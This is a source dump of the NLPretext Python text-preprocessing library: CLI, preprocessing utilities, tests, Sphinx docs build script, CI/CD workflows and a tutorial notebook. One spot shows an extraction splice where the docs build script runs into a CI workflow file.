6 | from rich.console import Console
7 |
8 | app = typer.Typer()
9 | console = Console()
10 |
11 |
12 | @app.command()
13 | def run(
14 | input: List[str] = typer.Option( # noqa: B008
15 | [],
16 | "-i",
17 | "--input",
18 | case_sensitive=False,
19 | help="List of files that will be preprocessed",
20 | ),
21 | output: str = typer.Option(
22 | None,
23 | "-o",
24 | "--output",
25 | case_sensitive=False,
26 | help="File that will store the result of the preprocessing",
27 | ),
28 | ) -> None:
29 | """Runs NLPretext on a list of files and outputs the result in parquet format
30 | or shows the result if no output is provided.
31 |
32 | Args:
33 |
34 | input: List of files that will be preprocessed
35 |
36 | output: File that will store the result of the preprocessing
37 | """
38 | text_loader = TextLoader()
39 | preprocessor = Preprocessor()
40 | preprocessed_text_dataframe = text_loader.read_text(input, preprocessor=preprocessor)
41 | if output:
42 | preprocessed_text_dataframe.to_parquet(output)
43 | else:
44 | console.print(preprocessed_text_dataframe)
45 |
--------------------------------------------------------------------------------
/nlpretext/__init__.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 |
19 | # mypy: disable-error-code="attr-defined"
20 | # mypy: disable-error-code="assignment"
21 |
22 | """All the goto functions you need to handle NLP use-cases, integrated in NLPretext."""
23 |
24 | from importlib.metadata import PackageNotFoundError, version
25 |
26 | from nlpretext.preprocessor import Preprocessor
27 |
28 | try:
29 | __version__ = version(__name__)
30 | except PackageNotFoundError: # pragma: no cover
31 | __version__ = "unknown"
32 |
33 |
34 | __all__ = ["Preprocessor"]
35 |
--------------------------------------------------------------------------------
/.pre-commit-config.yaml:
--------------------------------------------------------------------------------
1 | default_language_version:
2 | python: python3.10
3 |
4 |
5 | repos:
6 | - repo: https://github.com/pre-commit/pre-commit-hooks
7 | rev: v4.5.0
8 | hooks:
9 | - id: trailing-whitespace
10 | - id: end-of-file-fixer
11 | - id: check-yaml
12 | - id: check-toml
13 | - id: check-json
14 | - id: check-added-large-files
15 |
16 | - repo: local
17 | hooks:
18 | - id: isort
19 | name: isort
20 | entry: poetry run isort --settings-path pyproject.toml
21 | types: [python]
22 | language: system
23 | stages: [commit, push]
24 | - id: pyupgrade
25 | name: pyupgrade
26 | entry: poetry run pyupgrade --py38-plus
27 | types: [python]
28 | language: system
29 | stages: [commit, push]
30 | - id: black
31 | name: black
32 | entry: poetry run black --config pyproject.toml
33 | types: [python]
34 | language: system
35 | stages: [commit, push]
36 | - id: ruff
37 | name: ruf
38 | entry: poetry run ruff check --config pyproject.toml
39 | types: [python]
40 | language: system
41 | stages: [commit, push]
42 | - id: mypy
43 | name: mypy
44 | entry: poetry run mypy
45 | require_serial: true
46 | types: [python]
47 | language: system
48 | stages: [push]
49 | - id: gitleaks
50 | name: gitleaks
51 | entry: make gitleaks
52 | require_serial: true
53 | types: [file]
54 | language: system
55 | pass_filenames: false
56 | stages: [push]
57 |
--------------------------------------------------------------------------------
/docs/scripts/buildsite.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | export SOURCE_DATE_EPOCH=$(git log -1 --pretty=%ct)
4 |
5 | ##############
6 | # BUILD DOCS #
7 | ##############
8 |
9 | # Python Sphinx, configured with source/conf.py
10 | # See https://www.sphinx-doc.org/
11 |
12 | cd docs/
13 |
14 | current_tag=$(git symbolic-ref -q --short HEAD || git describe --tags --exact-match)
15 | current_tag_message=$(git cat-file -p $(git rev-parse $(git tag -l | tail -n1)) | tail -n +6)
16 |
17 | make clean
18 | make apidoc
19 | git add .
20 | git commit -m "Commit needed for multiversioning"
21 |
22 | git pull --tags
23 | git tag -a latest -m "Latest version of the package"
24 |
25 | make multiversion
26 |
27 | #######################
28 | # Update GitHub Pages #
29 | #######################
30 |
31 | docroot=`mktemp -d`
32 | cp -r build/html/* ${docroot}
33 |
34 | cd ..
35 |
36 | git branch -d gh-pages
37 | git checkout --orphan gh-pages
38 | git rm --cached -r .
39 | git clean -fdx
40 |
41 | # Adds .nojekyll file to the root to signal to GitHub that
42 | # directories that start with an underscore (_) can remain
43 | touch .nojekyll
44 |
45 | # Add index.html
46 | cat > index.html <
48 |
49 |
50 | Redirecting to the latest release
51 |
52 |
53 |
54 |
55 |
56 | EOF
57 |
58 | # Add README
59 | cat > README.md <> $GITHUB_PATH
63 |
64 | - name: Install dependencies
65 | run: |
66 | poetry run pip install --upgrade pip
67 | poetry install -E torch -E dask
68 |
69 | - name: Run safety checks
70 | run: |
71 | STRICT=1 make check-safety
72 |
73 | - name: Lint and format
74 | run: |
75 | make format-code
76 |
77 | - name: Run tests
78 | run: |
79 | make test
80 |
--------------------------------------------------------------------------------
/tests/test_phone_number.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 | import nlpretext._utils.phone_number as phone
19 | from nlpretext._config.config import SUPPORTED_COUNTRY
20 |
21 |
22 | def test_extract_phone_number():
23 | input_str = "(541) 754-3010 is a US. Phone"
24 | expected = ["(541) 754-3010", "754-3010"]
25 | res = phone.extract_phone_numbers(input_str, countrylist=SUPPORTED_COUNTRY)
26 | assert sorted(res) == sorted(expected)
27 |
28 |
29 | def test_extract_phone_number_us():
30 | input_str = "(541) 754-3010 is a US. Phone"
31 | expected = ["(541) 754-3010"]
32 | res = phone.extract_phone_numbers(input_str, countrylist=["US"])
33 | assert res == expected
34 |
35 |
36 | def test_extract_phone_number_fr():
37 | input_str = "06.00.00.00.00 is a FR Phone"
38 | expected = ["06.00.00.00.00"]
39 | res = phone.extract_phone_numbers(input_str, countrylist=["FR"])
40 | assert res == expected
41 |
42 |
43 | def test_extract_phone_number_international():
44 | input_str = "+33600000000 is an international Phone number"
45 | expected = ["+33600000000"]
46 | res = phone.extract_phone_numbers(input_str, countrylist=["US", "GB", "FR", None])
47 | assert res == expected
48 |
49 |
50 | def test_phone_parser_us():
51 | input_str = "(541) 754-3010"
52 | expected = "+1 541-754-3010"
53 | p = phone.PhoneParser()
54 | p.parse_number(input_str, region_code="US")
55 | res = p.format_number("INTERNATIONAL")
56 | assert res == expected
57 |
58 |
59 | def test_phone_parser_fr():
60 | input_str = "0600000000"
61 | expected = "+33600000000"
62 | p = phone.PhoneParser()
63 | p.parse_number(input_str, region_code="FR")
64 | res = p.format_number("E164")
65 | assert res == expected
66 |
--------------------------------------------------------------------------------
/nlpretext/preprocessor.py:
--------------------------------------------------------------------------------
1 | from typing import Any, Callable, Dict, List, Optional
2 |
3 | from nlpretext.basic.preprocess import fix_bad_unicode, normalize_whitespace, remove_eol_characters
4 | from nlpretext.social.preprocess import (
5 | remove_emoji,
6 | remove_hashtag,
7 | remove_html_tags,
8 | remove_mentions,
9 | )
10 | from sklearn.pipeline import Pipeline
11 | from sklearn.preprocessing import FunctionTransformer
12 |
13 |
14 | class Preprocessor:
15 | def __init__(self):
16 | """Initialize preprocessor object to apply all text transformation."""
17 | self.__operations = []
18 | self.pipeline = None
19 |
20 | def pipe(self, operation: Callable[[Any], Any], args: Optional[Dict[str, Any]] = None) -> None:
21 | """
22 | Add an operation and its arguments to pipe in the preprocessor.
23 |
24 | Parameters
25 | ----------
26 | operation : callable
27 | text preprocessing function
28 | args : dict of arguments
29 | """
30 | self.__operations.append({"operation": operation, "args": args})
31 |
32 | @staticmethod
33 | def build_pipeline(operation_list: List[Dict[Any, Any]]) -> Pipeline:
34 | """
35 | Build sklearn pipeline from a operation list.
36 |
37 | Parameters
38 | ----------
39 | operation_list : iterable
40 | list of __operations of preprocessing
41 |
42 | Returns
43 | -------
44 | sklearn.pipeline.Pipeline
45 | """
46 | return Pipeline(
47 | steps=[
48 | (
49 | operation["operation"].__name__,
50 | FunctionTransformer(operation["operation"], kw_args=operation["args"]),
51 | )
52 | for operation in operation_list
53 | ]
54 | )
55 |
56 | def run(self, text: str) -> str:
57 | """
58 | Apply pipeline to text.
59 |
60 | Parameters
61 | ----------
62 | text : string
63 | text to preprocess
64 |
65 | Returns
66 | -------
67 | string
68 | """
69 | operations = self.__operations
70 | if operations == []:
71 | operations_to_pipe = (
72 | remove_html_tags,
73 | remove_mentions,
74 | remove_emoji,
75 | remove_hashtag,
76 | remove_eol_characters,
77 | fix_bad_unicode,
78 | normalize_whitespace,
79 | )
80 | operations = [
81 | {"operation": operation, "args": None} for operation in operations_to_pipe
82 | ]
83 | self.pipeline = self.build_pipeline(operations)
84 | text = self.pipeline.transform(text)
85 | return text
86 |
--------------------------------------------------------------------------------
/nlpretext/_utils/stopwords.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2020 Artefact
2 | # licence-information@artefact.com
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License");
5 | # you may not use this file except in compliance with the License.
6 | # You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License
15 |
16 |
17 | from typing import List
18 |
19 | from nlpretext._config.stopwords import STOPWORDS
20 | from stop_words import LANGUAGE_MAPPING as _LANGUAGE_MAPPING
21 | from stop_words import get_stop_words as _get_stop_words
22 |
23 |
24 | def get_stopwords(lang: str = "en") -> List[str]:
25 | """Input a language code, returns a list of stopwords for the specified language.
26 |
27 | Parameters
28 | ----------
29 | lang : str
30 | Supported languages: ['ar', 'bg', 'ca', 'cz', 'da', 'nl', 'en',
31 | 'fi', 'fr', 'de', 'hi', 'hu', 'id', 'it', 'nb', 'pl', 'pt', 'ro', 'ru',
32 | 'sk', 'es', 'sv', 'tr', 'uk', 'vi', 'af', 'ha', 'so', 'st', 'sw', 'yo',
33 | 'zu', 'da', 'de', 'es', 'et', 'fi', 'fr', 'hr', 'hu', 'it', 'ko', 'nl',
34 | 'no', 'pl', 'pt', 'ru', 'sv', 'tr', 'zh', 'eo', 'he', 'la', 'sk', 'sl',
35 | 'br', 'ca', 'cs', 'el', 'eu', 'ga', 'gl', 'hy', 'id', 'ja', 'lv', 'th',
36 | 'ar', 'bg', 'bn', 'fa', 'hi', 'mr', 'ro', 'en']
37 |
38 | Returns
39 | -------
40 | list
41 | list of stopwords for a given language
42 |
43 | Raises
44 | ------
45 | ValueError
46 | When language is not available yet or incorrect country code
47 | """
48 | if isinstance(lang, str) and len(lang) == 2:
49 | lang = lang.lower()
50 | custom_stopwords = STOPWORDS
51 | stopwords = []
52 |
53 | supported_lang_lib = list(_LANGUAGE_MAPPING.keys())
54 | supported_lang_custom = list(custom_stopwords.keys())
55 | supported_lang = supported_lang_lib + supported_lang_custom
56 | if lang in supported_lang:
57 | if lang in supported_lang_lib:
58 | stopwords += _get_stop_words(lang)
59 | if lang in supported_lang_custom:
60 | stopwords += custom_stopwords[lang]
61 | else:
62 | raise ValueError(
63 | "Language not available yet or incorrect country code."
64 | f" Supported languages: {supported_lang}"
65 | )
66 | else:
67 | raise ValueError('Please input a valid country code, in 2 letters. Eg. "us" for USA. ')
68 | return list(set(stopwords))
69 |
--------------------------------------------------------------------------------
/tests/test_data_augmentation.py:
--------------------------------------------------------------------------------
1 | import pytest
2 | from nlpretext.augmentation.text_augmentation import (
3 | CouldNotAugment,
4 | UnavailableAugmenter,
5 | get_augmenter,
6 | process_entities_and_text,
7 | )
8 |
9 |
10 | @pytest.mark.parametrize(
11 | "text, text_augmented, entities, expected",
12 | [
13 | (
14 | "I want to buy a small black handbag.",
15 | "I want to acquire a small black handbag",
16 | [
17 | {"entity": "Size", "word": "small", "startCharIndex": 16, "endCharIndex": 21},
18 | {"entity": "Color", "word": "black", "startCharIndex": 22, "endCharIndex": 27},
19 | {"entity": "Type", "word": "handbag", "startCharIndex": 28, "endCharIndex": 35},
20 | ],
21 | {"type": str, "entities": ["black", "handbag", "small"]},
22 | ),
23 | (
24 | "I want to buy a small black handbag.",
25 | "I would like to buy a black small handbag",
26 | [
27 | {"entity": "Size", "word": "small", "startCharIndex": 16, "endCharIndex": 21},
28 | {"entity": "Color", "word": "black", "startCharIndex": 22, "endCharIndex": 27},
29 | {"entity": "Type", "word": "handbag", "startCharIndex": 28, "endCharIndex": 35},
30 | ],
31 | {"type": str, "entities": ["black", "handbag", "small"]},
32 | ),
33 | ],
34 | )
35 | def test_process_entities_and_text_not_altered(text, text_augmented, entities, expected):
36 | augmented_text, augmented_entities = process_entities_and_text(entities, text, text_augmented)
37 | augmented_entities = sorted(el["word"] for el in augmented_entities)
38 | assert {"type": type(augmented_text), "entities": augmented_entities} == expected
39 |
40 |
41 | @pytest.mark.parametrize(
42 | "text, text_augmented, entities",
43 | [
44 | (
45 | "I live in New York and I am looking for a lipstick",
46 | "I live in New and York I an looking for a lipstick",
47 | [
48 | {"entity": "City", "word": "New York", "startCharIndex": 10, "endCharIndex": 18},
49 | {"entity": "Type", "word": "bag", "startCharIndex": 42, "endCharIndex": 50},
50 | ],
51 | )
52 | ],
53 | )
54 | def test_process_entities_and_text_altered(text, text_augmented, entities):
55 | with pytest.raises(CouldNotAugment) as excinfo:
56 | process_entities_and_text(entities, text, text_augmented)
57 | assert (
58 | str(excinfo.value) == "Text was not correctly augmented because entities were altered"
59 | )
60 |
61 |
62 | def test_get_augmenter():
63 | method = "ppdb_synonym"
64 | with pytest.raises(UnavailableAugmenter) as excinfo:
65 | get_augmenter(method)
66 | assert (
67 | str(excinfo.value)
68 | == "The given augmenter is not supported. You must choose one \
69 | of the following: wordnet_synonym or aug_sub_bert"
70 | )
71 |
--------------------------------------------------------------------------------
/nlpretext/_utils/file_loader.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 | # mypy: disable-error-code="assignment"
19 |
20 | from typing import List, Union
21 |
22 | import chardet
23 | from nlpretext._config import constants
24 |
25 |
26 | def detect_encoding(file_path_or_string: Union[str, bytes], n_lines: int = 100) -> str:
27 | """
28 | Predict a file's encoding using chardet.
29 |
30 | Parameters
31 | ----------
32 | file_path_or_string : string
33 | if filepath, will open the file. Otherwise will predict from the string
34 | n_lines : int
35 | number of line to predict from
36 |
37 | Returns
38 | -------
39 | string
40 | the code of the detected encoding
41 | """
42 | if isinstance(file_path_or_string, bytes):
43 | rawdata = file_path_or_string
44 | else:
45 | with open(file_path_or_string, "rb") as f:
46 | rawdata = b"".join([f.readline() for _ in range(n_lines)])
47 | chardet_value: str = chardet.detect(rawdata)
48 | return chardet_value
49 |
50 |
51 | def check_text_file_format(filepath: Union[str, List[str]]) -> str:
52 | """
53 | Retrieve format of a file path or list of files path, among .csv, .json, .parquet and .txt.
54 |
55 | Parameters
56 | ----------
57 | filepath : str | list(str)
58 | A filepath with wildcard (eg. *.txt), or a list of filepaths.
59 |
60 | Returns
61 | -------
62 | str
63 | Format of the specified file path, among .json, .csv, .parquet or .txt
64 | """
65 | pattern = constants.TEXT_FILE_FORMATS_PATTERN
66 | if not isinstance(filepath, (list, tuple)):
67 | filepath = [filepath]
68 | format_re_list = [pattern.match(path) for path in filepath]
69 | format_list = [format_re.group(1) for format_re in format_re_list if format_re]
70 | if len(set(format_list)) > 1:
71 | raise ValueError(f"Multiple file formats found in file path list: {format_list}")
72 | if None in format_re_list:
73 | raise ValueError(
74 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted" # noqa: E501
75 | )
76 | file_format = format_list[0]
77 | return file_format
78 |
--------------------------------------------------------------------------------
/docs/source/conf.py:
--------------------------------------------------------------------------------
1 | # Configuration file for the Sphinx documentation builder.
2 | #
3 | # This file only contains a selection of the most common options. For a full
4 | # list see the documentation:
5 | # https://www.sphinx-doc.org/en/master/usage/configuration.html
6 |
7 | # -- Path setup --------------------------------------------------------------
8 |
9 | # If extensions (or modules to document with autodoc) are in another directory,
10 | # add these directories to sys.path here. If the directory is relative to the
11 | # documentation root, use os.path.abspath to make it absolute, like shown here.
12 | #
13 | import os
14 | import sys
15 |
16 | sys.path.insert(0, os.path.abspath(".."))
17 |
18 |
19 | # -- Project information -----------------------------------------------------
20 |
21 | project = "nlpretext"
22 | author = "artefactory"
23 |
24 | # -- General configuration ---------------------------------------------------
25 |
26 | # Add any Sphinx extension module names here, as strings. They can be
27 | # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
28 | # ones.
29 | extensions = [
30 | "sphinx.ext.autodoc",
31 | "sphinx.ext.autosummary",
32 | "sphinx.ext.intersphinx",
33 | "sphinx.ext.mathjax",
34 | "sphinx.ext.napoleon",
35 | "sphinx.ext.todo",
36 | "sphinx.ext.viewcode",
37 | "recommonmark",
38 | "nbsphinx",
39 | "sphinx_multiversion",
40 | "sphinx_autodoc_typehints",
41 | "sphinx_rtd_theme",
42 | ]
43 |
44 | source_suffix = {
45 | ".rst": "restructuredtext",
46 | ".txt": "restructuredtext",
47 | ".md": "markdown",
48 | }
49 |
50 | source_parsers = {".md": "recommonmark.parser.CommonMarkParser"}
51 |
52 | nbsphinx_execute = "never"
53 |
54 | github_url = "https://github.com/artefactory/NLPretext"
55 |
56 | smv_prefer_remote_refs = False
57 | smv_remote_whitelist = None
58 | smv_prebuild_command = (
59 | "poetry run sphinx-apidoc -f -o source/apidoc/ "
60 | "../nlpretext/ "
61 | "--implicit-namespaces -M -t source/_templates"
62 | )
63 |
64 | # Add any paths that contain templates here, relative to this directory.
65 | templates_path = ["_templates"]
66 |
67 | # Autodoc parameters
68 | always_document_param_types = True
69 | add_module_names = False
70 | autodoc_member_order = "bysource"
71 |
72 | # -- Options for HTML output -------------------------------------------------
73 |
74 | # The theme to use for HTML and HTML Help pages. See the documentation for
75 | # a list of builtin themes.
76 |
77 | html_theme = "sphinx_rtd_theme"
78 |
79 | github_url = "https://www.github.com/artefactory/NLPretext}"
80 |
81 |
82 | # Add any paths that contain custom static files (such as style sheets) here,
83 | # relative to this directory. They are copied after the builtin static files,
84 | # so a file named "default.css" will overwrite the builtin "default.css".
85 | html_static_path = ["_static"]
86 |
87 | # -- Options for LaTeX output ------------------------------------------------
88 |
89 | latex_elements = {
90 | # Font packages
91 | "fontpkg": "\\usepackage{amsmath, amsfonts, amssymb, amsthm}"
92 | }
93 |
--------------------------------------------------------------------------------
/docs/source/tutorials/basic_notebook.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "metadata": {},
6 | "source": [
7 | "# How to use the package in a notebook\n",
8 | "\n",
9 | "\n",
10 | "\n",
11 | "
\n",
12 | "\n",
13 | "\n",
14 | "\n",
15 | "
\n",
16 | "\n",
17 | "### *nlpretext*\n",
18 | "\n",
19 | "
\n",
20 | "\n",
21 | "## Installing from the main branch\n",
22 | "\n",
23 | "To install the library from the main branch, you can run the following cell :"
24 | ]
25 | },
26 | {
27 | "cell_type": "code",
28 | "execution_count": null,
29 | "metadata": {
30 | "pycharm": {
31 | "name": "#%%\n"
32 | }
33 | },
34 | "outputs": [],
35 | "source": [
36 | "%pip install git+ssh://git@github.com/artefactory/NLPretext.git@main"
37 | ]
38 | },
39 | {
40 | "cell_type": "markdown",
41 | "metadata": {},
42 | "source": [
43 | "## Installing from a specific release\n",
44 | "\n",
45 | "To install the library from a specific release, you can run the following cell :"
46 | ]
47 | },
48 | {
49 | "cell_type": "code",
50 | "execution_count": null,
51 | "metadata": {
52 | "pycharm": {
53 | "name": "#%%\n"
54 | }
55 | },
56 | "outputs": [],
57 | "source": [
58 | "%pip install git+ssh://git@github.com/artefactory/NLPretext.git@v1.0.5"
59 | ]
60 | },
61 | {
62 | "cell_type": "markdown",
63 | "metadata": {},
64 | "source": [
65 | "## Using the package\n",
66 | "\n",
67 | "You can now import and run whatever is in the package :"
68 | ]
69 | },
70 | {
71 | "cell_type": "code",
72 | "execution_count": null,
73 | "metadata": {
74 | "pycharm": {
75 | "name": "#%%\n"
76 | }
77 | },
78 | "outputs": [],
79 | "source": [
80 | "from nlpretext.basic.preprocess import replace_emails\n",
81 | "\n",
82 | "example = \"I have forwarded this email to obama@whitehouse.gov\"\n",
83 | "example = replace_emails(example, replace_with=\"*EMAIL*\")"
84 | ]
85 | },
86 | {
87 | "cell_type": "code",
88 | "execution_count": null,
89 | "metadata": {
90 | "pycharm": {
91 | "name": "#%%\n"
92 | }
93 | },
94 | "outputs": [],
95 | "source": [
96 | "print(example)"
97 | ]
98 | }
99 | ],
100 | "metadata": {
101 | "kernelspec": {
102 | "display_name": "Python 3",
103 | "language": "python",
104 | "name": "python3"
105 | },
106 | "language_info": {
107 | "codemirror_mode": {
108 | "name": "ipython",
109 | "version": 3
110 | },
111 | "file_extension": ".py",
112 | "mimetype": "text/x-python",
113 | "name": "python",
114 | "nbconvert_exporter": "python",
115 | "pygments_lexer": "ipython3",
116 | "version": "3.7.9"
117 | }
118 | },
119 | "nbformat": 4,
120 | "nbformat_minor": 1
121 | }
122 |
--------------------------------------------------------------------------------
/.github/workflows/cd.yml:
--------------------------------------------------------------------------------
1 | name: Continuous Deployment
2 | on:
3 | release:
4 | types: [published]
5 |
6 | jobs:
7 |
8 | docker:
9 |
10 | runs-on: ubuntu-latest
11 |
12 | steps:
13 | - name: Checkout
14 | uses: actions/checkout@v4
15 |
16 | - name: Set up Docker Buildx
17 | uses: docker/setup-buildx-action@v3
18 |
19 | - name: Login to Github Container Registry
20 | uses: docker/login-action@v3
21 | with:
22 | username: ${{ github.actor }}
23 | password: ${{ secrets.GITHUB_TOKEN }}
24 | registry: ghcr.io
25 |
26 | - name: Set tag name
27 | id: tag
28 | run: echo "tag_name=${GITHUB_REF//\//-}" >> $GITHUB_OUTPUT
29 | env:
30 | GITHUB_REF: ${{ github.ref }}
31 |
32 | - name: Build and push
33 | uses: docker/build-push-action@v4
34 | with:
35 | context: .
36 | file: ./docker/Dockerfile
37 | push: true
38 | tags: |
39 | ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}
40 | ghcr.io/artefactory/nlpretext:latest
41 | cache-from: type=registry,ref=ghcr.io/artefactory/nlpretext:latest
42 | cache-to: type=inline
43 |
44 | - name: Scan image
45 | uses: anchore/scan-action@v3
46 | id: scan
47 | with:
48 | image: "ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}"
49 | output-format: table
50 |
51 | - name: upload Anchore scan SARIF report
52 | if: success() || failure()
53 | uses: github/codeql-action/upload-sarif@v1
54 | with:
55 | sarif_file: ${{ steps.scan.outputs.sarif }}
56 |
57 | documentation_and_package:
58 |
59 | runs-on: ubuntu-latest
60 |
61 | strategy:
62 | matrix:
63 | python-version: ["3.8"]
64 |
65 | steps:
66 |
67 | - name: Checkout
68 | uses: actions/checkout@v4
69 |
70 | - name: Set up Python ${{ matrix.python-version }}
71 | uses: actions/setup-python@v4
72 | with:
73 | python-version: ${{ matrix.python-version }}
74 |
75 | - name: Install poetry and pandoc
76 | run: |
77 | sudo apt-get install pandoc
78 | make download-poetry
79 |
80 | - name: Set up cache
81 | uses: actions/cache@v3.3.2
82 | with:
83 | path: ~/.cache/pypoetry/virtualenvs
84 | key: venv-${{ matrix.python-version }}-${{ hashFiles('pyproject.toml') }}-${{ hashFiles('poetry.lock') }}
85 |
86 | - name: Set Poetry Path
87 | run: |
88 | echo "$HOME/.poetry/bin" >> $GITHUB_PATH
89 |
90 | - name: Install dependencies
91 | run: |
92 | poetry install -E torch -E dask
93 |
94 | - name: Publish to PyPI
95 | env:
96 | PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}
97 | run: |
98 | poetry config pypi-token.pypi $PYPI_TOKEN
99 | poetry publish --build
100 |
101 | - name: Run build script for Sphinx pages
102 | run: |
103 | poetry run git config --global user.name "Github-Pages Bot"
104 | poetry run git config --global user.email "github-pages@artefactory.com"
105 | poetry run sh docs/scripts/buildsite.sh
106 | shell: bash
107 |
--------------------------------------------------------------------------------
/nlpretext/token/preprocess.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2020 Artefact
2 | # licence-information@artefact.com
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License");
5 | # you may not use this file except in compliance with the License.
6 | # You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License
15 |
16 |
17 | from typing import List, Optional
18 |
19 | import re
20 |
21 | from nlpretext._utils.stopwords import get_stopwords
22 |
23 |
24 | def remove_stopwords(
25 | tokens: List[str], lang: str, custom_stopwords: Optional[List[str]] = None
26 | ) -> List[str]:
27 | """
28 | Remove stopwords from a text.
29 | eg. 'I like when you move your body !' -> 'I move body !'.
30 |
31 | Parameters
32 | ----------
33 | tokens: list(str)
34 | list of tokens
35 | lang: str
36 | language iso code (e.g : "en")
37 | custom_stopwords : list(str)|None
38 | list of custom stopwords to add. None by default
39 |
40 | Returns
41 | -------
42 | list
43 | tokens without stopwords
44 |
45 | Raises
46 | ------
47 | ValueError
48 | When inputs is not a list
49 | """
50 | stopwords = get_stopwords(lang)
51 | if custom_stopwords:
52 | stopwords += custom_stopwords
53 | tokens = [word for word in tokens if word not in stopwords]
54 | return tokens
55 |
56 |
57 | def remove_tokens_with_nonletters(tokens: List[str]) -> List[str]:
58 | """
59 | Inputs a list of tokens, outputs a list of tokens without tokens that
60 | includes numbers of special caracters.
61 | ['foo','bar','124','34euros'] -> ['foo','bar'].
62 |
63 | Parameters
64 | ----------
65 | tokens : list
66 | list of tokens to be cleaned
67 |
68 | Returns
69 | -------
70 | list
71 | list of tokens without tokens with numbers
72 | """
73 | tokens = [word for word in tokens if re.search("[^a-zA-Z]", word) is None]
74 | return tokens
75 |
76 |
77 | def remove_special_caracters_from_tokenslist(tokens: List[str]) -> List[str]:
78 | """
79 | Remove tokens that doesn't contains any number or letter.
80 | eg. ['foo','bar','---',"'s",'#'] -> ['foo','bar',"'s"].
81 |
82 | Parameters
83 | ----------
84 | tokens : list
85 | list of tokens to be cleaned
86 |
87 | Returns
88 | -------
89 | list
90 | list of tokens without tokens that contains only special caracters
91 |
92 | """
93 | tokens = [word for word in tokens if re.search("[a-zA-Z0-9]", word)]
94 | return tokens
95 |
96 |
97 | def remove_smallwords(tokens: List[str], smallwords_threshold: int) -> List[str]:
98 | """
99 | Function that removes words which length is below a threshold
100 | ["hello", "my", "name", "is", "John", "Doe"] --> ["hello","name","John","Doe"].
101 |
102 | Parameters
103 | ----------
104 | text : list
105 | list of strings
106 | smallwords_threshold: int
107 | threshold of small word
108 |
109 | Returns
110 | -------
111 | list
112 | """
113 | tokens = [word for word in tokens if len(word) > smallwords_threshold]
114 | return tokens
115 |
--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
1 | # Contributor Covenant Code of Conduct
2 |
3 | ## Our Pledge
4 |
5 | In the interest of fostering an open and welcoming environment, we as
6 | contributors and maintainers pledge to making participation in our project and
7 | our community a harassment-free experience for everyone, regardless of age, body
8 | size, disability, ethnicity, sex characteristics, gender identity and expression,
9 | level of experience, education, socio-economic status, nationality, personal
10 | appearance, race, religion, or sexual identity and orientation.
11 |
12 | ## Our Standards
13 |
14 | Examples of behavior that contributes to creating a positive environment
15 | include:
16 |
17 | * Using welcoming and inclusive language
18 | * Being respectful of differing viewpoints and experiences
19 | * Gracefully accepting constructive criticism
20 | * Focusing on what is best for the community
21 | * Showing empathy towards other community members
22 |
23 | Examples of unacceptable behavior by participants include:
24 |
25 | * The use of sexualized language or imagery and unwelcome sexual attention or
26 | advances
27 | * Trolling, insulting/derogatory comments, and personal or political attacks
28 | * Public or private harassment
29 | * Publishing others' private information, such as a physical or electronic
